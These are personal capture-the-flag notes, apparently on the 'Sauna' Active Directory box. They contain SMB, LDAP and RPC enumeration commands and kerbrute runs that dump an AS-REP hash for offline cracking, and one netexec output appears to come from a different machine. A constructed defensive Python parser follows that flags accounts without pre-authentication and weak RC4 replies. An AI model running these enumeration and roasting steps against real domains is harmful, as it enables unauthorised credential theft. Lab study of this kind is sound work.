Sauna
Start
Scanning with nmap
Host script results:
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-11-24T03:14:39
Enumerate
lika@learning:~/Downloads/CVE-2024-8353$ netexec smb $IP
[*] Adding missing option 'check_guest_account' in config section 'nxc' to nxc.conf
[*] Adding missing section 'BloodHound-CE' to nxc.conf
[*] Adding missing option 'bhce_enabled' in config section 'BloodHound-CE' to nxc.conf
SMB 10.10.10.100 445 DC [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False) (Null Auth:True)
netexec smb $target -u '' -p '' --users
netexec smb $target -u '' -p '' --rid-brute
netexec smb $target -u 'guest' -p '' --rid-brute
netexec ldap $target -u 'guest' -p '' --users
netexec ldap $target -u 'guest' -p '' --rid-brute
netexec ldap $target -u '' -p '' --users
rpcclient -U "" -N <ip>
After connecting, run these commands:
serverinfo
lsaenumsid
netshareenumall
enumdomusers
querydispinfo
enumdomgroups
enumdomains
certipy-ad find -u '' -p '' -dc-ip $target -vulnerable
nmap -n -sV --script "ldap* and not brute" -p 389 $target
enum4linux -a $target
Get the user list
kerbrute userenum user2.txt --dc $target -d EGOTISTICAL-BANK.LOCAL
Use the Python username generator to build the user list
lika@learning:~/Downloads/AD-Username-Generator$ kerbrute userenum generated.txt --dc $target -d EGOTISTICAL-BANK.LOCAL
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: dev (n/a) - 11/28/25 - Ronnie Flathers @ropnop
2025/11/28 23:08:45 > Using KDC(s):
2025/11/28 23:08:45 > 10.10.10.175:88
2025/11/28 23:08:45 > [+] VALID USERNAME: hsmith@EGOTISTICAL-BANK.LOCAL
2025/11/28 23:08:45 > [+] VALID USERNAME: HSmith@EGOTISTICAL-BANK.LOCAL
2025/11/28 23:08:45 > Done! Tested 11 usernames (2 valid) in 0.083 seconds
[-] invalid principal syntax
lika@learning:~/Downloads/AD-Username-Generator$ kerbrute userenum ../AD-Username-Generator/generated.txt --dc $target -d EGOTISTICAL-BANK.LOCAL
Version: dev (n/a) - 11/29/25 - Ronnie Flathers @ropnop
2025/11/29 00:02:46 > Using KDC(s):
2025/11/29 00:02:46 > 10.10.10.175:88
2025/11/29 00:02:46 > [+] VALID USERNAME: hsmith@EGOTISTICAL-BANK.LOCAL
2025/11/29 00:02:46 > [+] VALID USERNAME: HSmith@EGOTISTICAL-BANK.LOCAL
2025/11/29 00:02:46 > [+] fsmith has no pre auth required. Dumping hash to crack offline:
2025/11/29 00:02:46 > [+] VALID USERNAME: fsmith@EGOTISTICAL-BANK.LOCAL
2025/11/29 00:02:46 > [+] FSmith has no pre auth required. Dumping hash to crack offline:
2025/11/29 00:02:46 > [+] VALID USERNAME: FSmith@EGOTISTICAL-BANK.LOCAL
Another command
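Added example, not part of the original writeup: a Python parser for kerbrute's output that folds case variants of the same principal together (AD matches Kerberos principal names case-insensitively, which is why hsmith and HSmith both show up as valid above) and records the encryption type of each AS-REP hash, so a defender reviewing the same output can see which accounts have pre-authentication disabled and whether the KDC is still issuing RC4 (etype 23) replies, which are far cheaper to crack offline than the AES256 (etype 18) ones. The sample output and hash bodies are constructed.

```python
import re
from collections import defaultdict
from dataclasses import dataclass

# Constructed sample of kerbrute output (shape modelled on the runs above; hash bodies are fake).
SAMPLE_OUTPUT = """\
2025/11/29 00:02:46 > [+] VALID USERNAME: hsmith@EGOTISTICAL-BANK.LOCAL
2025/11/29 00:02:46 > [+] VALID USERNAME: HSmith@EGOTISTICAL-BANK.LOCAL
2025/11/29 00:02:46 > [+] fsmith has no pre auth required. Dumping hash to crack offline:
$krb5asrep$18$fsmith@EGOTISTICAL-BANK.LOCAL:00112233445566778899aabbccddeeff$0123456789abcdef
2025/11/29 00:02:46 > [+] VALID USERNAME: fsmith@EGOTISTICAL-BANK.LOCAL
$krb5asrep$23$FSmith@EGOTISTICAL-BANK.LOCAL:ffeeddccbbaa99887766554433221100$fedcba9876543210
"""

# Kerberos encryption types (RFC 3961 / RFC 4757) that appear after "$krb5asrep$".
ETYPE_NAMES = {17: "aes128-cts-hmac-sha1-96", 18: "aes256-cts-hmac-sha1-96", 23: "rc4-hmac"}

VALID_RE = re.compile(r"\[\+\] VALID USERNAME: (?P<user>[^@\s]+)@(?P<realm>\S+)")
ASREP_RE = re.compile(r"^\$krb5asrep\$(?P<etype>\d+)\$(?P<user>[^@]+)@(?P<realm>[^:]+):"
                      r"(?P<checksum>[0-9a-f]+)\$(?P<cipher>[0-9a-f]+)$")

@dataclass(frozen=True)
class AsrepHash:
    user: str    # principal exactly as printed (case preserved)
    realm: str
    etype: int

    @property
    def weak(self) -> bool:
        # etype 23 keys the reply with the bare NT hash (no salt, no PBKDF2 iterations),
        # so it cracks orders of magnitude faster than the AES types.
        return self.etype == 23

def parse_asrep(line: str):
    """Parse one $krb5asrep$ line; return AsrepHash, or None for any other line."""
    m = ASREP_RE.match(line.strip())
    return AsrepHash(m["user"], m["realm"], int(m["etype"])) if m else None

def summarize(output: str):
    """Return (valid accounts, {account: [AsrepHash, ...]}). Case variants are folded
    together because AD matches Kerberos principal names case-insensitively."""
    valid, roastable = set(), defaultdict(list)
    for line in output.splitlines():
        m = VALID_RE.search(line)
        if m:
            valid.add(m["user"].lower())
            continue
        h = parse_asrep(line)
        if h:
            roastable[h.user.lower()].append(h)
    return valid, dict(roastable)
```

Any account listed in the second return value is one where "Do not require Kerberos preauthentication" is set; clearing that flag, and disabling RC4 on the domain so no etype 23 replies are issued, are the two fixes that remove the finding.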